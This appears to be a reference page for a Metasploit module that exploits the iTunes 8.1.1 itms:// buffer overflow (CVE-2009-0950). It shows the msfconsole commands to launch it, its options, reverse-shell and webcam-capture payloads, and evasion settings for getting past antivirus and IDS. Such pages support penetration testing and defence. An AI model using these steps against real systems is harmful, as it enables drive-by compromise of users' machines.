Apple OS X iTunes 8.1.1 ITMS Overflow - Metasploit


This page contains detailed information about how to use the exploit/multi/browser/itms_overflow metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Apple OS X iTunes 8.1.1 ITMS Overflow
Module: exploit/multi/browser/itms_overflow
Source code: modules/exploits/multi/browser/itms_overflow.rb
Disclosure date: 2009-06-01
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): OSX
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2009-0950

This modules exploits a stack-based buffer overflow in iTunes itms:// URL parsing. It is accessible from the browser and in Safari, itms urls will be opened in iTunes automatically. Because iTunes is multithreaded, only vfork-based payloads should be used.

Module Ranking and Traits


Module Ranking:

  • great: The exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check. More information about ranking can be found here.

Basic Usage


msf > use exploit/multi/browser/itms_overflow
msf exploit(itms_overflow) > exploit

Go back to menu.

Msfconsole Usage


Here is how the multi/browser/itms_overflow exploit module looks in the msfconsole:

msf6 > use exploit/multi/browser/itms_overflow

[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf6 exploit(multi/browser/itms_overflow) > show info

       Name: Apple OS X iTunes 8.1.1 ITMS Overflow
     Module: exploit/multi/browser/itms_overflow
   Platform: OSX
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2009-06-01

Provided by:
  Will Drewry <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   OS X

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT  8080             yes       The local port to listen on.
  SSL      false            no        Negotiate SSL for incoming connections
  SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                   no        The URI to use for this exploit (default is random)

Payload information:
  Space: 1024
  Avoid: 0 characters

Description:
  This modules exploits a stack-based buffer overflow in iTunes 
  itms:// URL parsing. It is accessible from the browser and in 
  Safari, itms urls will be opened in iTunes automatically. Because 
  iTunes is multithreaded, only vfork-based payloads should be used.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2009-0950
  OSVDB (54833)
  http://support.apple.com/kb/HT3592
  http://redpig.dataspill.org/2009/05/drive-by-attack-for-itunes-811.html

Module Options


This is a complete list of options available in the multi/browser/itms_overflow exploit:

msf6 exploit(multi/browser/itms_overflow) > show options

Module options (exploit/multi/browser/itms_overflow):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   OS X

Advanced Options


Here is a complete list of advanced options supported by the multi/browser/itms_overflow exploit:

msf6 exploit(multi/browser/itms_overflow) > show advanced

Module advanced options (exploit/multi/browser/itms_overflow):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   ListenerComm                             no        The specific communication channel to use for this service
   SSLCipher                                no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false            no        Enable SSL/TLS-level compression
   SendRobots              false            no        Return a robots.txt file if asked for one
   URIHOST                                  no        Host to use in URI (useful for tunnels)
   URIPORT                                  no        Port to use in URI (useful for tunnels)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module

Payload advanced options (generic/shell_reverse_tcp):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   ARCH                                         no        The architecture that is being targeted
   PLATFORM                                     no        The platform that is being targeted
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/browser/itms_overflow module can exploit:

msf6 exploit(multi/browser/itms_overflow) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   OS X

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/browser/itms_overflow exploit:

msf6 exploit(multi/browser/itms_overflow) > show payloads

Compatible Payloads
===================

   #   Name                                      Disclosure Date  Rank    Check  Description
   -   ----                                      ---------------  ----    -----  -----------
   0   payload/generic/custom                                     normal  No     Custom Payload
   1   payload/generic/debug_trap                                 normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_tcp                             normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                          normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/tight_loop                                 normal  No     Generic x86 Tight Loop
   5   payload/osx/x86/bundleinject/bind_tcp                      normal  No     Mac OS X Inject Mach-O Bundle, Bind TCP Stager
   6   payload/osx/x86/bundleinject/reverse_tcp                   normal  No     Mac OS X Inject Mach-O Bundle, Reverse TCP Stager
   7   payload/osx/x86/exec                                       normal  No     OS X Execute Command
   8   payload/osx/x86/isight/bind_tcp                            normal  No     Mac OS X x86 iSight Photo Capture, Bind TCP Stager
   9   payload/osx/x86/isight/reverse_tcp                         normal  No     Mac OS X x86 iSight Photo Capture, Reverse TCP Stager
   10  payload/osx/x86/shell_bind_tcp                             normal  No     OS X Command Shell, Bind TCP Inline
   11  payload/osx/x86/shell_reverse_tcp                          normal  No     OS X Command Shell, Reverse TCP Inline
   12  payload/osx/x86/vforkshell/bind_tcp                        normal  No     OS X (vfork) Command Shell, Bind TCP Stager
   13  payload/osx/x86/vforkshell/reverse_tcp                     normal  No     OS X (vfork) Command Shell, Reverse TCP Stager
   14  payload/osx/x86/vforkshell_bind_tcp                        normal  No     OS X (vfork) Command Shell, Bind TCP Inline
   15  payload/osx/x86/vforkshell_reverse_tcp                     normal  No     OS X (vfork) Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the multi/browser/itms_overflow exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/browser/itms_overflow) > show evasion

Module evasion options:

   Name                      Current Setting  Required  Description
   ----                      ---------------  --------  -----------
   HTML::base64              none             no        Enable HTML obfuscation via an embeded base64 html object (IE not supported) (Accepted: none, plain, single_pad, double_pad, random_space_injection)
   HTML::javascript::escape  0                no        Enable HTML obfuscation via HTML escaping (number of iterations)
   HTML::unicode             none             no        Enable HTTP obfuscation via unicode (Accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be)
   HTTP::chunked             false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression         none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding      false            no        Enable folding of HTTP headers
   HTTP::junk_headers        false            no        Enable insertion of random junk HTTP headers
   HTTP::no_cache            false            no        Disallow the browser to cache HTTP content
   HTTP::server_name         Apache           yes       Configures the Server header of all outgoing replies
   TCP::max_send_size        0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay           0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Will Drewry <redpig[at]dataspill.org>

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.